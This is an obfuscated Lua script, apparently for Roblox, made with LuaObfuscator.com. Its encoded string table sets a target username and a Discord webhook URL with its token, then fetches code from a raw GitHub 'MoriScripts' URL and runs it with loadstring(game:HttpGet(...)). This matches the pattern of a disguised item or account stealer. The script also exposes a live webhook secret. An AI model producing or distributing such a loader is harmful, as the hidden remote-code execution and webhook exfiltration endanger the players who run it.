--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v30,1,1));return "";end end else local v68=v2(v0(v30,16));if v19 then local v74=v5(v68,v19);v19=nil;return v74;else return v68;end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((621 -(555 + 64))^(v32-((1997 -(68 + 997)) -(857 + 74)))))%(2^(((v33-(569 -(367 + 201))) -(v32-(928 -((1484 -(226 + 1044)) + 713)))) + (2 -1))) ;return v69-(v69%(2 -1)) ;else local v70=(3 -1)^(v32-(1638 -(1523 + 114))) ;return (((v31%(v70 + v70))>=v70) and (1 + (0 -0))) or (0 -0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(892 + (245 -(67 + 113)))) );v18=v18 + (9 -5) ;return (v40 * (31011612 -14234396)) + (v39 * (120312 -54776)) + (v38 * (606 -(64 + 23 + 263))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 + 0 ,35 -15 ) * (2^(127 -95))) + v41 ;local v45=v20(v42,21 + 0 + 0 ,983 -(802 + 150) );local v46=((v20(v42,100 -(840 -(201 + 571)) )==(2 -1)) and  -(1 -0)) or (1 + 0) ;if (v45==(997 -((2053 -(116 + 1022)) + 82))) then if (v44==(0 -0)) then return v46 * (0 -0) ;else v45=3 -2 ;v43=(0 -0) + 0 ;end elseif (v45==(2691 -644)) then return ((v44==(1187 -(1069 + 118))) and (v46 * ((2 -1)/0))) or (v46 * NaN) ;end return v8(v46,v45-(2237 -1214) ) * (v43 + (v44/((1488 -(998 + 488))^(17 + 35)))) ;end local function v25(v47)local v48=0 + (1913 -(1789 + 124)) ;local v49;local v50;while true do if (v48==(10 -7)) then return v6(v50);end if (v48==(1080 -((1786 -(745 + 21)) + 21 + 39))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=860 -(814 + 45) ;end if (v48==2) then v50={};for v75=(7 -4) -(7 -5) , #v49 do v50[v75]=v2(v1(v3(v49,v75,v75)));end v48=7 -4 ;end if (v48==(1 + 0)) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=1749 -(760 + 987) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=1086 -(461 + 625) ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=4) then else while true do if (v52==1) then local v94=0;while true do if (v94==(1289 -(993 + 295))) then v52=2;break;end if (v94==(0 + 0)) then v55=nil;v56=nil;v94=1172 -(418 + 753) ;end end end if (v52~=(0 + 0)) then else local v95=0;local v96;while true do if ((0 + 0)==v95) then v96=0 + 0 ;while true do if (v96~=1) then else v52=1 + 0 ;break;end if ((529 -(406 + 123))==v96) then local v110=0;while true do if (v110==0) then v53=0;v54=nil;v110=1770 -(1749 + 20) ;end if (v110==(1 + 0)) then v96=1;break;end end end end break;end end end if ((1324 -(1249 + 73))~=v52) then else local v97=0 + 0 ;local v98;while true do if (v97==0) then v98=0;while true do if (1~=v98) then else v52=1148 -(466 + 679) ;break;end if (v98==(0 -0)) then v57=nil;v58=nil;v98=2 -1 ;end end break;end end end if (v52==(1903 -(106 + 1794))) then v59=nil;while true do local v99=0 + 0 ;local v100;while true do if (v99~=0) then else v100=0;while true do if (v100~=0) then else local v111=0;while true do if (v111~=1) then else v100=1 + 0 ;break;end if (v111==0) then if (v53==1) then local v169=0 -0 ;local v170;while true do if (v169~=0) then else v170=0 -0 ;while true do if (v170~=(114 -(4 + 110))) then else v57={v54,v55,nil,v56};v58=v23();v170=1428 -(41 + 1386) ;end if ((104 -(17 + 86))==v170) then v59={};v53=2 + 0 ;break;end end break;end end end if (v53==(3 -1)) then local v171=0;local v172;while true do if (v171~=(0 -0)) then else v172=0;while true do if (v172~=(166 -(122 + 44))) then else local v173=0 -0 ;while true do if (v173==1) then v172=1;break;end if (v173==0) then for v181=1,v58 do local v182=0 -0 ;local v183;local v184;local v185;local v186;while true do if ((2 + 0)~=v182) then else while true do if (v183~=(0 + 0)) then else local v193=0;while true do if (1~=v193) then else v183=1 -0 ;break;end if (v193==0) then v184=65 -(30 + 35) ;v185=nil;v193=1 + 0 ;end end end if (v183~=(1258 -(1043 + 214))) then else v186=nil;while true do if (v184==(0 -0)) then local v198=1212 -(323 + 889) ;local v199;local v200;while true do if (v198==0) then v199=0;v200=nil;v198=2 -1 ;end if (v198==1) then while true do if ((580 -(361 + 219))~=v199) then else v200=320 -(53 + 267) ;while true do if (v200~=(1 + 0)) then else v184=1;break;end if (v200==0) then local v213=413 -(15 + 398) ;while true do if (v213==0) then v185=v21();v186=nil;v213=983 -(18 + 964) ;end if ((3 -2)~=v213) then else v200=1 + 0 ;break;end end end end break;end end break;end end end if (v184~=(1 + 0)) then else if (v185==(851 -(20 + 830))) then v186=v21()~=0 ;elseif (v185==2) then v186=v24();elseif (v185~=3) then else v186=v25();end v59[v181]=v186;break;end end break;end end break;end if (v182==(0 + 0)) then v183=126 -(116 + 10) ;v184=nil;v182=1;end if ((1 + 0)==v182) then v185=nil;v186=nil;v182=2;end end end v57[3]=v21();v173=739 -(542 + 196) ;end end end if (v172~=(1 -0)) then else for v176=1 + 0 ,v23() do local v177=0;local v178;local v179;while true do if (v177~=(0 + 0)) then else v178=0;v179=nil;v177=1 + 0 ;end if (v177==1) then while true do if (v178==0) then v179=v21();if (v20(v179,2 -1 ,2 -1 )~=(1551 -(1126 + 425))) then else local v189=405 -(118 + 287) ;local v190;local v191;local v192;while true do if (v189==1) then local v194=0 -0 ;while true do if (v194==1) then v189=2;break;end if (v194==0) then v192={v22(),v22(),nil,nil};if (v190==(377 -(142 + 235))) then local v204=0;local v205;local v206;while true do if (1==v204) then while true do if (v205~=(0 -0)) then else v206=0 + 0 ;while true do if (v206~=(977 -(553 + 424))) then else v192[3]=v22();v192[4]=v22();break;end end break;end end break;end if (v204~=0) then else v205=0;v206=nil;v204=1 -0 ;end end elseif (v190==1) then v192[3 + 0 ]=v23();elseif (v190==(2 + 0)) then v192[3]=v23() -(2^(10 + 6)) ;elseif (v190~=(2 + 1)) then else local v214=0 + 0 ;local v215;local v216;while true do if (v214~=(0 -0)) then else v215=0 -0 ;v216=nil;v214=2 -1 ;end if (v214~=(1 + 0)) then else while true do if (v215~=(0 -0)) then else v216=0;while true do if ((753 -(239 + 514))==v216) then v192[3]=v23() -(2^(6 + 10)) ;v192[4]=v22();break;end end break;end end break;end end end v194=1;end end end if (v189==2) then local v195=1329 -(797 + 532) ;while true do if (v195==0) then if (v20(v191,1 + 0 ,1)~=1) then else v192[2]=v59[v192[1 + 1 ]];end if (v20(v191,2,4 -2 )==1) then v192[1205 -(373 + 829) ]=v59[v192[3]];end v195=732 -(476 + 255) ;end if (v195~=(1131 -(369 + 761))) then else v189=2 + 1 ;break;end end end if (v189==(5 -2)) then if (v20(v191,3,5 -2 )==(239 -(64 + 174))) then v192[1 + 3 ]=v59[v192[4]];end v54[v176]=v192;break;end if (v189==0) then local v197=0 -0 ;while true do if ((337 -(144 + 192))==v197) then v189=217 -(42 + 174) ;break;end if (v197~=(0 + 0)) then else v190=v20(v179,2,3);v191=v20(v179,4 + 0 ,3 + 3 );v197=1505 -(363 + 1141) ;end end end end end break;end end break;end end end v53=1583 -(1183 + 397) ;break;end end break;end end end v111=2 -1 ;end end end if (v100~=1) then else if (v53==(0 + 0)) then local v147=0 + 0 ;local v148;local v149;while true do if (v147~=(1975 -(1913 + 62))) then else v148=0;v149=nil;v147=1;end if (v147~=1) then else while true do if ((0 + 0)==v148) then v149=0;while true do if (v149~=(0 -0)) then else local v174=1933 -(565 + 1368) ;while true do if (v174~=0) then else v54={};v55={};v174=1;end if (v174==(3 -2)) then v149=1;break;end end end if (v149==1) then v56={};v53=1662 -(1477 + 184) ;break;end end break;end end break;end end end if (v53~=(3 -0)) then else local v150=0;local v151;local v152;while true do if (v150==(1 + 0)) then while true do if (0==v151) then v152=856 -(564 + 292) ;while true do if (0==v152) then local v175=0 -0 ;while true do if (v175~=0) then else for v187=1,v23() do v55[v187-(2 -1) ]=v28();end return v57;end end end end break;end end break;end if (v150~=(304 -(244 + 60))) then else v151=0 + 0 ;v152=nil;v150=1;end end end break;end end break;end end end break;end end break;end if (v51==(476 -(41 + 435))) then v52=0;v53=nil;v51=1;end if (v51~=2) then else v56=nil;v57=nil;v51=3;end if (v51~=(1002 -(938 + 63))) then else v54=nil;v55=nil;v51=2;end if (v51==3) then v58=nil;v59=nil;v51=4 + 0 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v77=v64;local v78=v65;local v79=v66;local v80=v27;local v81=1;local v82= -1;local v83={};local v84={...};local v85=v12("#",...) -1 ;local v86={};local v87={};for v91=0,v85 do if (v91>=v79) then v83[v91-v79 ]=v84[v91 + 1 ];else v87[v91]=v84[v91 + 1 ];end end local v88=(v85-v79) + 1 ;local v89;local v90;while true do v89=v77[v81];v90=v89[1];if (v90<=5) then if (v90<=2) then if (v90<=0) then v62[v89[3]]=v87[v89[2]];elseif (v90==1) then do return;end else local v112=v89[2];local v113,v114=v80(v87[v112](v13(v87,v112 + 1 ,v89[3])));v82=(v114 + v112) -1 ;local v115=0;for v141=v112,v82 do v115=v115 + 1 ;v87[v141]=v113[v115];end end elseif (v90<=3) then v81=v89[3];elseif (v90==4) then local v116=0;local v117;while true do if (0==v116) then v117=v89[2];v87[v117]=v87[v117](v13(v87,v117 + 1 ,v82));break;end end else v87[v89[2]]=v89[3]~=0 ;end elseif (v90<=8) then if (v90<=6) then v87[v89[2]]=v62[v89[3]];elseif (v90==7) then if (v87[v89[2]]==v89[4]) then v81=v81 + 1 ;else v81=v89[3];end else v87[v89[2]]=v89[3];end elseif (v90<=10) then if (v90>9) then local v121=0;while true do if (v121==2) then v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v121=3;end if (v121==1) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v121=2;end if (v121==0) then v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v121=1;end if (v121==4) then v81=v89[3];break;end if (v121==3) then v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v121=4;end end else local v122=v89[2];local v123=v87[v89[3]];v87[v122 + 1 ]=v123;v87[v122]=v123[v89[4]];end elseif (v90==11) then v87[v89[2]]();else local v127;local v128,v129;local v130;local v131;v62[v89[3]]=v87[v89[2]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v62[v89[3]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v62[v89[3]];v81=v81 + 1 ;v89=v77[v81];v131=v89[2];v130=v87[v89[3]];v87[v131 + 1 ]=v130;v87[v131]=v130[v89[4]];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3];v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]=v89[3]~=0 ;v81=v81 + 1 ;v89=v77[v81];v131=v89[2];v128,v129=v80(v87[v131](v13(v87,v131 + 1 ,v89[3])));v82=(v129 + v131) -1 ;v127=0;for v144=v131,v82 do v127=v127 + 1 ;v87[v144]=v128[v127];end v81=v81 + 1 ;v89=v77[v81];v131=v89[2];v87[v131]=v87[v131](v13(v87,v131 + 1 ,v82));v81=v81 + 1 ;v89=v77[v81];v87[v89[2]]();v81=v81 + 1 ;v89=v77[v81];v81=v89[3];end v81=v81 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030F3O00466F78795475746F7269616C735974030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3132353436323830323438343639353234322F74767534424C462O43626341792D453152506C55726F443463666C4B4D596F434C7A51586550544775495739794E487349396D48424C564C305368674851634E3335583100173O0012083O00013O0026073O000E000100020004033O000E0001001208000100043O00120C000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026073O0001000100010004033O00010001001208000100043O00120A000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00013O00017O00",v9(),...);end
